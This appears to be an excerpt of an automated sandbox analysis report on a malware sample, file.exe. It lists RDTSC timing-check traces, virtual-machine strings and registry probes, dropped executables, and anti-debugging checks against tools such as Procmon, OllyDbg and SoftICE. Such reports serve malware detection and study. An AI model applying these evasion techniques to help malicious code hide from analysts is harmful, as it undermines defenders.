Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D71483 second address: 4D714A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+2Ch], ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov ax, bx 0x00000014 mov si, di 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D714A9 second address: 4D71510 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 22F55285h 0x00000008 pushfd 0x00000009 jmp 00007F8A2C4FB2A2h 0x0000000e and ax, 5F18h 0x00000013 jmp 00007F8A2C4FB29Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov ax, word ptr [esi+30h] 0x00000020 jmp 00007F8A2C4FB2A6h 0x00000025 mov word ptr [edx+30h], ax 0x00000029 jmp 00007F8A2C4FB2A0h 0x0000002e mov ax, word ptr [esi+32h] 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D71510 second address: 4D7152D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D7152D second address: 4D71533 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D71533 second address: 4D71537 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D71537 second address: 4D7155E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [edx+32h], ax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F8A2C4FB2A7h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D7155E second address: 4D71564 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D71564 second address: 4D71568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D71568 second address: 4D71593 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+34h] 0x0000000b jmp 00007F8A2C7FDC27h 0x00000010 mov dword ptr [edx+34h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D71593 second address: 4D71597 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D71597 second address: 4D715B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D715B2 second address: 4D71649 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C4FB2A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test ecx, 00000700h 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F8A2C4FB29Ch 0x00000016 jmp 00007F8A2C4FB2A5h 0x0000001b popfd 0x0000001c mov ebx, eax 0x0000001e popad 0x0000001f jne 00007F8A9D0B93B1h 0x00000025 pushad 0x00000026 mov bx, si 0x00000029 pushfd 0x0000002a jmp 00007F8A2C4FB2A4h 0x0000002f add eax, 7A371148h 0x00000035 jmp 00007F8A2C4FB29Bh 0x0000003a popfd 0x0000003b popad 0x0000003c or dword ptr [edx+38h], FFFFFFFFh 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F8A2C4FB2A5h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D71649 second address: 4D7164F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D7164F second address: 4D716A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 or dword ptr [edx+3Ch], FFFFFFFFh 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F8A2C4FB2A5h 0x00000013 jmp 00007F8A2C4FB29Bh 0x00000018 popfd 0x00000019 pushad 0x0000001a push eax 0x0000001b pop edi 0x0000001c mov si, 0511h 0x00000020 popad 0x00000021 popad 0x00000022 or dword ptr [edx+40h], FFFFFFFFh 0x00000026 jmp 00007F8A2C4FB29Ch 0x0000002b pop esi 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f push edi 0x00000030 pop ecx 0x00000031 mov ecx, ebx 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D716A0 second address: 4D716A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90676 second address: 4D9067C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9067C second address: 4D90694 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8A2C7FDC24h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90694 second address: 4D906A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D906A3 second address: 4D906A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D906A7 second address: 4D906AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D906AB second address: 4D906B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D906B1 second address: 4D906B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D906B7 second address: 4D906BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40D6A second address: 4D40D7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8A2C4FB29Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40D7A second address: 4D40D92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8A2C7FDC1Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40D92 second address: 4D40DC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C4FB2A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8A2C4FB2A8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40DC4 second address: 4D40DCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40DCA second address: 4D40DD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40DD0 second address: 4D40DD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40DD4 second address: 4D40E0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C4FB2A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F8A2C4FB2A0h 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push edi 0x00000019 pop eax 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40E0D second address: 4D40E13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40E13 second address: 4D40E17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D503C4 second address: 4D503C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D503C9 second address: 4D503CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D503CF second address: 4D503F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov esi, 30A2F375h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D503F0 second address: 4D50402 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8A2C4FB29Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50402 second address: 4D5041B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D5041B second address: 4D50421 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50421 second address: 4D50466 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F8A2C7FDC1Dh 0x00000014 pushfd 0x00000015 jmp 00007F8A2C7FDC20h 0x0000001a and eax, 1D78E988h 0x00000020 jmp 00007F8A2C7FDC1Bh 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50466 second address: 4D5048B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 mov di, 75F6h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push dword ptr [ebp+0Ch] 0x0000000f jmp 00007F8A2C4FB29Dh 0x00000014 push dword ptr [ebp+08h] 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D5048B second address: 4D50491 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D504BB second address: 4D504CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C4FB29Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D719AB second address: 4D719AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D719AF second address: 4D719B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D719B3 second address: 4D719B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D719B9 second address: 4D719F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C4FB2A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F8A2C4FB2A0h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8A2C4FB29Eh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 9E8B53 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00825DC7 rdtsc 0_2_00825DC7
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vf1vAsw4V14DJWwee1eCdfd3e4\Y-Cleaner.exe
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vf1vAsw4V14DJWwee1eCdfd3e4\Bunifu_UI_v1.5.3.dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\soft[1]
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\dll[1]
Source: C:\Users\user\Desktop\file.exe TID: 6640 Thread sleep count: 39 > 30
Source: C:\Users\user\Desktop\file.exe TID: 6640 Thread sleep time: -78039s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 2228 Thread sleep count: 41 > 30
Source: C:\Users\user\Desktop\file.exe TID: 2228 Thread sleep time: -82041s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 1476 Thread sleep count: 179 > 30
Source: C:\Users\user\Desktop\file.exe TID: 1476 Thread sleep count: 169 > 30
Source: C:\Users\user\Desktop\file.exe TID: 1476 Thread sleep count: 164 > 30
Source: C:\Users\user\Desktop\file.exe TID: 1476 Thread sleep count: 158 > 30
Source: C:\Users\user\Desktop\file.exe TID: 1476 Thread sleep count: 160 > 30
Source: C:\Users\user\Desktop\file.exe TID: 1476 Thread sleep count: 129 > 30
Source: C:\Users\user\Desktop\file.exe TID: 1476 Thread sleep count: 132 > 30
Source: C:\Users\user\Desktop\file.exe TID: 1476 Thread sleep count: 88 > 30
Source: C:\Users\user\Desktop\file.exe TID: 6488 Thread sleep count: 80 > 30
Source: C:\Users\user\Desktop\file.exe TID: 6488 Thread sleep time: -160080s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 6188 Thread sleep count: 48 > 30
Source: C:\Users\user\Desktop\file.exe TID: 6188 Thread sleep time: -96048s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 6504 Thread sleep count: 46 > 30
Source: C:\Users\user\Desktop\file.exe TID: 6504 Thread sleep time: -92046s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 528 Thread sleep count: 77 > 30
Source: C:\Users\user\Desktop\file.exe TID: 528 Thread sleep time: -154077s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 1520 Thread sleep count: 78 > 30
Source: C:\Users\user\Desktop\file.exe TID: 1520 Thread sleep time: -156078s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 6196 Thread sleep count: 66 > 30
Source: C:\Users\user\Desktop\file.exe TID: 6196 Thread sleep time: -132066s >= -30000s
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004176E7 FindFirstFileExW,0_2_004176E7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_10007EA9 FindFirstFileExW,0_2_10007EA9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04B4794E FindFirstFileExW,0_2_04B4794E
Source: file.exe, file.exe, 00000000.00000002.2922575318.00000000009A1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Amcache.hve.6.dr Binary or memory string: VMware
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.6.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: file.exe, 00000000.00000003.2462863476.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2336836012.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2412397203.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2387108968.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2538613139.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2513460894.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2488030998.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2311558878.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2437588864.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2611648947.0000000005583000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2361967106.0000000005583000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.6.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: file.exe, 00000000.00000002.2923721847.0000000000FC6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP~X
Source: Amcache.hve.6.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.6.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr Binary or memory string: vmci.sys
Source: Amcache.hve.6.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.6.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.6.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.6.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: file.exe, 00000000.00000002.2922575318.00000000009A1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Amcache.hve.6.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe File opened: NTICE
Source: C:\Users\user\Desktop\file.exe File opened: SICE
Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00825DC7 rdtsc 0_2_00825DC7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040A54A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040A54A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00402A20 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,0_2_00402A20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_10007A76 mov eax, dword ptr fs:[00000030h] 0_2_10007A76
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_10005F25 mov eax, dword ptr fs:[00000030h] 0_2_10005F25
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F0C96B push dword ptr fs:[00000030h] 0_2_00F0C96B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_04B30D90 mov eax, dword ptr fs:[00000030h] 0_2_04B30D90
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_04B3092B mov eax, dword ptr fs:[00000030h] 0_2_04B3092B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00402EC0 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,HeapFree,VirtualAlloc,0_2_00402EC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004099EA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_004099EA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040A54A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040A54A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040CDA3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040CDA3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040A6E0 SetUnhandledExceptionFilter,0_2_0040A6E0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_10002ADF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_10002ADF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_100056A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_100056A0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_10002FDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_10002FDA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_04B39C51 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_04B39C51
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_04B3A7B1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_04B3A7B1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_04B3D00A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_04B3D00A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_04B3A947 SetUnhandledExceptionFilter,0_2_04B3A947
Source: file.exe, file.exe, 00000000.00000002.2922575318.00000000009A1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_04CF96AC cpuid 0_3_04CF96AC
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004107E2 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,0_2_004107E2
Source: Amcache.hve.6.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr | Binary or memory string: msmpeng.exe
